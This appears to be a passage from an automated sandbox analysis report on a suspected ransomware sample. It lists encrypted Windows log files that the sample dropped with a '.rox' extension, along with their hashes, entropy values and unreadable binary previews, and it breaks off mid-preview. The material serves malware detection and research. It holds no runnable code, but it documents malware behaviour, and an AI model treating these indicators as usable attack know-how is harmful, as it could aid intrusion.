        MD5:E662CDFC2E53468F8BC117B37EDD5F99
        SHA1:BAADDB2C8AE75C4C78F06C15EFB054F37EFA16E0
        SHA-256:28BE5DD4347437F2B307325E0EF49205AB86B8EB99B014729B029BCC8EA0BBDF
        SHA-512:C5AC32B5291C52A89C837587732697322CAEC21AA4D65290906D389F752BEDC84A343868154FF0E9D28B88E3E0164F226C2960C6491A43FCB830B921E236C014
        Malicious:true
        Preview:.H>.......1...s]J....K.X.....I.<.Y.Y.a.~I.G8..,;....^...Gm.. j}2J...........]....ypD..0.5...D......%`..^.fP..9.0..l...E..2..........zd...U....Tj..=..U....e....S.g}.....x.#...........V...5_Uw..R.b.F.dn..q..#...sk~F..X`.4ln.eC./......E(.-....n.}d.a'..T5.v....(m._c.....7>+. ...3.x.X..>f ...3.X......H6..5Ci.4...^...M.*....I.*U...V1.B.V'...~..i.$...c..k.W............R...1C.7.a"..:...{tBe<8nY.....U#..[..!~....".....N.._B#...Uk.z2.....P.#....9y.$........e..L.k\o...]...v/...q.T0.\....A..id...).<......T..s*d.%*0).)9?....0......?...0...F........ %..#...l..0.%~..Y*.2M....u.e......]n.v....a..9.C..s...H.(.e..j.n.......|.......Z.W......<._...'.2..f..(.WRT..k..}.!...6.5*I..Y..."Lp..kl....,....'.@;k.).O}a.;P.....o......]XvsT1.s.....l$...e.+...UP...k....P........d.Q...=7...o....b4w.. .TH......._..........e.\5..... .%r....".....I.7cA.Y).|;.]......`jEa;.W.oE..M=..-u.M.....*0...@..Y.z.6...5[.xr.S..~8P=;8..).k.R.y...ON...\.*...l.%I...?w9.....c..._

        C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10032023-125739-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):37000
        Entropy (8bit):7.995092882603945
        Encrypted:true
        SSDEEP:768:8tK7c9FPoZfArQrpd75M1pDicVCCKf8nXsdQ/e+974rIY+1g22k6b8N5WkCIXP7n:8UsFPo9AKrFM1pDicpKOXsdstn1gvk20
        MD5:E7D1AF3B111829CFA2E672006D8CFF84
        SHA1:52EACDFEB2D9CD38B2447203D3EF03ECB994B10E
        SHA-256:7D61428D11104E69AFDD8D733F0ECAFC4192EC2FA611A818DEA3427DC5D718DD
        SHA-512:B0AC287C78317892E104D8FA5AFE9FFEE118F854EB5CA797F315A29559D41924FE5BCD864FE5C67F4CE7B326ECC61225600FE1C6EBF2551EF6EA2EEB4E971457
        Malicious:true
        Preview:V...}...+...Q...w....a....g4..3..*.v}UA.*l..gS..&Y..;...QK&._..|.JwmUv3K....Q.OUOCi.#yq..8.-.P...&w......6.&....!d.;.\..:....f..m.@...9c..tHx..\.........w.4_r...<<.@..VO.l3..+.~BRF...../5......2..P4....w.6.......?.).....pw....z.{-...y.....o...K.....ur{m.lj~`?..D......Pe.vA...m...T"/`.>R.lr.8.I.7wi#..>.@ZX.W...}.....,..~fx.'...2.m .u.h...?...q....g..L.......].sQJ..".P..O$.e#VL....-;8.&.'0.|..'.....^......w..c.g....|&...mZ....;=..9.....G.!z.X6.....ROF..[W..*wI.t\|...6|2.yH.....:.G.,......K..]..B.&...U.u.]...>..+.u...~%..]:.....^..!B.._.=4g..u...1.<u.....%..%..Yo.....=...u*_.X...<;.jf.W...>*.KO..#B...T.0.} ..G^...Hk .Z..d....]up..v0H...0..4.......O..~...x.Dw9u.v2f=.]....c!.B.1..W..5.Q..va.....T.i._..pEc.(......M......(Q.{!.o......wb.FWc8T.....S..>..x.S.H.o}>....x.(iN...4.c/.T.F..sc..N..l@.m.L.V..a.UN.....,yR_+......k%.a...'..z..m.. ..4.I.5`%...5j#-7u].\W.m.....U...2. g...........7#,.L.9p..F.kE;.6L.(%.@.N....n,....7.@~....I

        C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-092906-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):24712
        Entropy (8bit):7.992525621774139
        Encrypted:true
        SSDEEP:768:hIsgpt6tHJbUILWYhtkXjAF/cAfEs/KX3:/Mt6T4IKzAFZ/KX3
        MD5:E02605B732BE055AEDEFC0F7BF2224BB
        SHA1:C527F8DDF4E108A85027EB9853A04D090C7BFF8B
        SHA-256:BA5FD7E84E16FD5F8A2478CA2F31733D40839220A8118ED963410F5B8E48F32D
        SHA-512:04CF5E63954B82A91A8D5DF87C3DD5DBC4CCF537B5D615DA2378EF7C52A75408025564737EAFDF0B5FCE3A56F7860215A47F1AFB88C9C437FED36B9657628FEB
        Malicious:true
        Preview:E[..vW..X...8..N...........Q..dT....$.9..LS..-d....*..bP#.......k:{.}..=.ys..!4..O.^.|...?..2.S....C...2'..o...<'.qG...........^....n....}...b..Q.g=..]~..`.......... ..^.W.]WJ..'..5.1.....).....g..%.~?..Le........3#....~..I...?.0...x...U....u.l.W.$-...+..@zgm...O#=.....h3."..L.e|..5.....Q.Nc*.u6.5>.+..%;..!.w=...NV5.X.uw.....,.F...s..g...v......^.Z>..~-@..q{.\`'..E+.uD.QC.....6..V....6iOh...Hc.k...<.V....A\..D.yf#,b..>JjK....d......&........K.4...p.b.r<F{p[%3.5...........U.aG.~..y........0@...b.H,)W..L.]..^$.M:...-`..w.....*dGH.....@a..m.e:.<..[.W.@....Pw...P...P=.?..D5.>..........:-j.}.;.P..q.......k....mN....n~.Z......z/.]+U....h~r.x..&...A...B...#...4D..= .$.6.(...J..H?.Th.j.5.U.|......C.;...V..-.<...[....$w.....Qs;..cY~.N..!. ..3.;..y......./..*N.S..h...%O..O.&..O<..../...A1...+..>.vB..M.:8`......R.....9y'.l...V.....t.5X.......B...?Fq*..J.v.U...VU&..S2....)9.#..(..........8`.I@....?.....>..R...r..hI~..I..9..)....<....\..$k=

        C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-093411-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):16520
        Entropy (8bit):7.9869201004749515
        Encrypted:false
        SSDEEP:384:mDF28CK2UAkrogiNwrg8MUM/JYsNWjleFBVqYue0p:8C/k0g6wrg8O+sJ5qYS
        MD5:8C094D598C913D8EF30A4A119D250F3F
        SHA1:9B9A06EF8B5D52DF4BFAF91A6557EB172D3EA31E
        SHA-256:604B0E71B60F73725921C770AF63BB9F47DAF29DF41CF1F5352B167B933E3706
        SHA-512:BD424CE7107020337916C14AF50AB5C59DA4B063EAF0349C2C0D02B82F66EB5195FCF285829A59B1B6FB6A0CA23D164EA39FA8B80B44BAE0422D30DC5C506BC8
        Malicious:false
        Preview:...sT=.;.n......:.m3d..j.........N...0.Q.4..R..S...w...I.jK.O......oLs...4...r...v...j..4qT.#.H.....s..J..G.05.Y..&.....OR..".7h.........9~....w%.VY+.F....67j7.Kg%6..:M.y\}8.k.p.[.3.......`=..w2noiI.-BBcbv...%W6..GS..>.1..a.@.#.-.'..T............o.M\./.......?P.=...v$...K.6P...*U....0.Q...{.....&q..fA?..%....$...9!F.Q.~L..r...8.....(."}B~X.g.Z!Uk&4...y:S......2.8...\....3.........^<..A.)h..OB.O.W......n.._.n...vz.4$s....h..&...;YO..^.....N..nv8)...l.9..}..2.1>....?.LW[..4....zx...&V[....n......Qo.....{.s.{.H.....[y....9..m...Q.).....!..~.-o..p.o..o:...^,...'...Q..qA......Z..`%bm...X6M.%}Z.@......bF#..d.g2-. ..q.MO..8Izr..../|eYk.B..\5.y@..sQ....p.g........R..f%F;G...U,.|...{..Vx+Z..^.-......`+...a..)z0T...T;$.N.rv.X,f..L.w..R<+.......t...m...I.($.$2...P......}..........P........6f..Eyt.6..-.zI..`W3..*.\9G..._..s..L.uU.Z,.?.V.qQb9.2..=...\.+........U..6"..RsQ.n..c..n.......8....7.zA.f)G....H0..qT.+[.B.{.b.w.......;.,..P.[|.zpBP...{RG$....{

        C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-093652-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):57480
        Entropy (8bit):7.996872821156674
        Encrypted:true
        SSDEEP:768:B8E2XKY91kM9F/yxlc8mj4vH62AKgcHTbamWRMaeGF7wCXffZz4kTLicn4FXKNtX:BQNx/yNZ9zymWRpeAf4EfRfVhTg+f
        MD5:0722EE5545B368D10A71FAACB1C238E1
        SHA1:E03B9EBF8718E3170BB9554187EA29576100B669
        SHA-256:A228E5B8195BC780A571FAACC40BF822AEDF6396F0B71141E9F3678A7F1FB568
        SHA-512:4EA62379C44DB022EA27BD9AF8FD70F00A61151B3ED583AA0B950525F2849B869D7CAF9E5C3F3D103325A335E6B254E0CE32FB650A5260C3752089606866E9C9
        Malicious:true
        Preview:N.....@...6e.....'c....w:...R5fA...h...N......O...j......y......Z.=0..8aL..Z..._|.........x.;...."Z.~.{.."..9\..~/..b...8py...4........f..O).nE9.G.C...>.e......5......a.g.....r.....m\...... .)g.xX...#.....W..v.(.Y.!.r..~.5.dx...+5..e....3....f(..a..u.-....z.y......)..A...S/k..P.:.BF.......x...5......n..-}..>...1.}.3;..c.`x4=bS..\.%......~......wE.....Q.>]...\...U}v.rD_V.t...L..L..|...\jd.">X>=a..v..P.'^......%+.y0nX.{......?.d.q1@O..S.8.bw..7DUf......<......!....I......\.?...f.|.(D.x@Z6d.0...j.dJ>@.L.v.|#6.....?...H.{X6`...e...v.d..+D.....^...\>~..2P..}~.3....&.....34G.y...t9C>.....MV...P...*U..yC....p..R.J._....^....'...r.)X...%..*.<sA.]$...{....C....$...9..F...w..u...SG.g.Ox.!.!..QdB..8.;..IOJo..%./k.a....T..n..F.w..%Z.(.dh& R...v#..m.G.\.af.:F...Z.Qyp..29E.G.LPK<.Y5u.a@..#Ig.y..UF.M(.}.|..g....=.P.....s.'..F......w.\...G.J3H.U/..K.fU=XBS0..U!..I.K.ue-...6B.a.....]..(.S.....6+...16....i..a8...v.c.....a.`....^G.=..!....N.%..x.

        C:\Documents and Settings\All Users\Microsoft\Windows Security Health\Logs\SHS-10042023-100200-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl.rox (copy)

        Download File
        Process:C:\Users\user\Desktop\2b7cu0KwZl.exe
        File Type:data
        Category:dropped
        Size (bytes):32904
        Entropy (8bit):7.994940619250542
        Encrypted:true
        SSDEEP:768:xnWFNAj/UQkdVaD0g6aluFy+Wz7cF5cyijWntDuDwK:xnWF+/UFw0zT5ccV5K
        MD5:71E343843A5E4D9702CC8F39D60B8C5A
        SHA1:F59C7E82FD606AB648ECE4F2522E2B4DFE422B62
        SHA-256:6FCB590E99F19A3F5B1D769963DBD8CEA629D8BCD092E5F3206B1DA9B7B70862
        SHA-512:C525678ADC033ED526E4B7400E42F080F40E3BCC764A216F3A9EFE3F9A9E911EC6575FE89B715391E78DDF55F4CE104199C18B7D78C427E63B826BDCA767996D
        Malicious:true
        Preview:.OIcWe6xEt.Ks.........6.&;.T...e..S.......<..-.!..;d.W....2b.5c...,'.....G(`S..;+.DTw^.sz.xwE..}`GS..\q..:..sa......t.x.....=I....+n.X...-5..,.[.S2......j?...g.%.....,=N...m.x?.Y........Ls.e.....Hm..Tc.@&R....c.n..%...F.".O..6!.y.%.UY.V..;.*...%.{(.S..?.U..(.OP..#..t9:..5..F&uHt..